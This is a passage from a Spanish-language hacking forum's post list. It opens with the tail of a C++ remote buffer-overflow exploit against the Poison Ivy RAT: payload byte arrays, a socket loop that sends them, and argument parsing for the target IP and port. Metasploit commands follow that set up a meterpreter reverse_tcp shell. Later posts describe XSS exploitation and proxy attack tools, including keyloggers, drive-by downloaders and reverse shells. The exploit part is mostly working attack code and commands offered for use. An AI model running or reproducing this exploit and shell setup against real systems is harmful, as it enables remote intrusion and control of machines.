0xcc, 0xc7, 0x5c, 0x5c, 0x3a, 0xf8, 0xea, 0x5e,
0xd9, 0x6e, 0xd4, 0x96, 0xa0, 0x8d, 0x99, 0x13,
0x84, 0x99, 0xff, 0xba, 0x41, 0xed, 0xf3, 0x1c,
0x67, 0xb6, 0xaa, 0x5a, 0x95, 0xfd, 0x92, 0x23,
0x9a, 0x72, 0x86, 0xcd, 0xf6, 0xa1, 0xb9, 0x44,
0xbc, 0x15, 0xc3, 0xac, 0xaa, 0xd6, 0x65, 0xf1,
0x08, 0x19, 0xf5, 0x2a, 0x62, 0xe4, 0x0d, 0x4e,
0x14, 0x1f, 0x21, 0x4d, 0x0c, 0x22, 0x06, 0x98,
0x84, 0x74, 0xf7, 0xaa, 0x18, 0x90, 0xd7, 0xe5,
0x2d, 0x04, 0x45, 0xb4, 0x2f, 0xbc, 0xdc, 0x97,
0xd2, 0x9b, 0x25, 0xe5, 0x4d, 0xb3, 0x51, 0x5f,
0x1a, 0x93, 0xe4, 0x97, 0x51, 0xc7, 0xd9, 0x81,
0x52, 0xee, 0x11, 0x83, 0x51, 0xb1, 0xd5, 0x34,
0x6f, 0xf1, 0xea, 0x9e, 0xbf, 0x4b, 0x6e, 0x33,
0x0d, 0x8a, 0x73, 0x15, 0xb9, 0xde, 0x92, 0x53,
0xd3, 0xfd, 0x5a, 0xcf, 0x69, 0xde, 0x19, 0x29,
0x05, 0xa1, 0x50, 0x78, 0x14, 0x81, 0xe5, 0xf1,
0x74, 0xea, 0x8c, 0x82, 0x58, 0x93, 0x74, 0x4f,
0x5a, 0x77, 0xb5, 0xde, 0x17, 0xd1, 0x48, 0x44,
0x1b, 0x1f, 0x32, 0x30, 0x9f, 0x64, 0x7c, 0x22,
0x4e, 0xd4, 0x1a, 0xae, 0x77, 0x01, 0x2b, 0x1f };
char payload3[] = {
0xe0, 0xf5, 0x3d, 0xc1, 0xf0, 0xea, 0x15, 0xdb,
0x43, 0x3e, 0x65, 0xf8, 0x9b, 0xe2, 0x14, 0xba,
0x90, 0x48, 0x5c, 0xd5, 0xec, 0x70, 0xa3, 0x8b,
0x41, 0x72, 0x28, 0x50, 0xec, 0xf6, 0xd5, 0x2a,
0xe6, 0x06, 0x46, 0xb2, 0xc5, 0x0c, 0x96, 0x6a,
0x69, 0x86, 0x6b, 0x12, 0xe4, 0x93, 0xe5, 0x11 };
int PoC(char * host, unsigned int port)
{
WSADATA wsa;
WSAStartup(MAKEWORD(2,0),&wsa);
SOCKET sock;
struct sockaddr_in local;
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
local.sin_family = AF_INET;
local.sin_addr.s_addr = inet_addr(host);
local.sin_port = htons(port);
if (connect(sock, (struct sockaddr *)&local, sizeof(local) ) == 0 )
{
connected = 1;
cout << ".";
for(long int i = 0; i<99; i++)
{
sendto(sock, payload, sizeof(payload), 0, (struct sockaddr *)&local,sizeof(local));
sendto(sock, payload2, sizeof(payload2), 0, (struct sockaddr *)&local,sizeof(local));
sendto(sock, payload3, sizeof(payload3), 0, (struct sockaddr *)&local,sizeof(local));
}
PoC(host, port);
}
else
{
if ( connected )
cout << endl << endl << "[+] Congrats, poison-ivy crashed!!" << endl;
else
cout << endl << endl << "[-] Sorry not poison ivy detected 8-(" << endl;
}
}
int main(int argc, char *argv[])
{
cout << "Poison-ivy remote buffer overflow " VERS << endl << endl;
cout << "by Kevin R.V <[email protected]" << endl;
if ( argc < 2 )
{
cout << "Usage: " << argv[0] << ".exe -h <ip> -p <port>" << endl << endl;
exit(-1);
}
u_short port;
char * ip;
for(int i = 0; i<argc; i++)
{
if( ! strcmp(argv[i], "-h") != 0 )
ip = argv[i+1];
else if( ! strcmp(argv[i], "-p") != 0 )
port = atoi(argv[i+1]);
}
cout << "[+] Starting exploit" << endl << endl;
PoC(ip, port);
return 1;
}Explotación del Remote Buffer Overflow desde el Mestasploit.
Citaruse exploit/windows/misc/poisonivy_bof
Citarmsf exploit(poisonivy_bof) > set PAYLOAD windows/meterpreter/reverse_tcp
Citarmsf exploit(poisonivy_bof) > set LHOST [MY IP ADDRESS]
Citarmsf exploit(poisonivy_bof) > set RHOST [TARGET IP]
Citarmsf exploit(poisonivy_bof) > exploit
#195
Bugs y Exploits / Xenotix XSS Exploit Framework
Enero 20, 2013, 11:12:10 PM
Es un proyecto OWASP liderado por Ajin Abraham, que consiste en proporcionar un framework a los "Pentester" para detectar y explotar vulnerabilidades XSS. Este framework es capaz de inyectar código XSS en la páginas WEB escaneadas y en las que se ha detectado una vulnerabilidad presente.
En definitiva Xenotix es la unión perfecta entre una herramienta XSS Scanner y aquella que permite poner a prueba dichas vulnerabilidades XSS Explotation Kit. Con Xenotix se tiene la herramienta perfecta para los Pentester, o lo que es lo mismo, para los profesionales de poner a prueba las aplicaciones web.
¿Cómo funciona?
El funcionamiento es muy sencillo, se proporciona la URL de la página WEB y la variable que va a ser analizada, en la intefaz (GUI) del framework.
Luego existe dos modo de operación: Manual y Automático. En el modo automático la herramienta realizará un prueba automática de detección e inyección de "payload" en la página variable de la URL proporcionada.
Una vez confirmada la vulnerabilidad podrá inyectarse un "payload" especifico como por ejemplo una shell inversa.
Características:
Built in XSS Payloads
XSS Key logger
XSS Executable Drive-by downloader
Automatic XSS Testing
XSS Encoder
XSS Reverse Shell (new)
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
#196
Bugs y Exploits / Re:XSSF
Enero 20, 2013, 11:07:36 PMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Buena no conocía este modulo pero... es mejor que beef? me funciona bastantre bien beef...
Saludos,
Dedalo
También prefiero utilizar beef, pero siempre hay que probar cosas nuevas.
Saludos.
#197
Bugs y Exploits / XSSF
Enero 19, 2013, 09:21:24 PM
Es una herramienta de seguridad diseñada para convertir la tarea de explotación de la vulnerabilidad XSS en un trabajo mucho más fácil. El XSSF pretende demostrar los peligros reales de vulnerabilidades XSS, vulgarizing su explotación. Este proyecto es creado exclusivamente para educación, pruebas de penetración y propósitos de la investigación legal
XssF permite administrar victimas de ataques XSS genéricos y persiste una conexión con dichas victimas por medio de un "loop" en javascript, el cual se encarga de enviar peticiones reversas en intervalos definidos de tiempo con el fin de ejecutar exploits contra la victima.
XssF es utilizado en Metasploit como un plugin adicional que se carga en el momento en el que se decida hacer uso de el, al igual que otras extensiones, se emplea el comando load para cargarlo en el contexto de metasploit, sin embargo antes de cargarlo, se debe tener en cuenta que las primeras instrucciones que se llevaran a cabo por el plugin, son la conexión con una base de datos para almacenar los resultados de las pruebas de penetración ejecutadas.
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
#198
Seguridad Wireless / Re:Wifite - Crackeador De Claves WEP/WPA
Enero 07, 2013, 09:20:43 PM
Es una gran herramienta la he prodado en Backbox 100% recomendada.
Saludos...
Saludos...
#200
Bugs y Exploits / Proxy Strike Toolkit
Enero 02, 2013, 07:45:01 PM
ProxyStrike v2.1 es una herramienta diseñada para encontrar vulnerabilidades mientras navega por una aplicación. Fue creada debido a los problemas que enfrentamos en los pentests de aplicaciones web que depende en gran medida de JavaScript.
En este momento se dispone con plugins de inyección SQL y XSS. Ambos plugins están diseñados para capturar las vulnerabilidades. El proceso es muy simple, ProxyStrike funciona como un proxy escucha en el puerto 8008 por defecto, así que tienes que navegar por el sitio Web que desee configurar su navegador para usar ProxyStrike como un proxy, y ProxyStrike analizará todos los parámetros en modo de fondo.
Características:
- Plugin de motor (Crea tus propios plugins!)
- Solicitud de interceptor
- Solicitar diffing
- Solicitud de repetidor
- Proceso de rastreo automático
- Solicitud/respuesta HTTP historia
- Estadísticas de petición de parámetro
- Solicitar valores de los parámetros estadísticas
- URL de la petición de parámetro y la firma de campo de la cabecera
- El uso de un proxy alternativo (TOR, por ejemplo)
- Sql ataques (plugin)
- Server Side Includes (plugin)
- Ataques XSS (plugin)
- Registros de ataque
- Exportación de resultados a HTML o XML
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
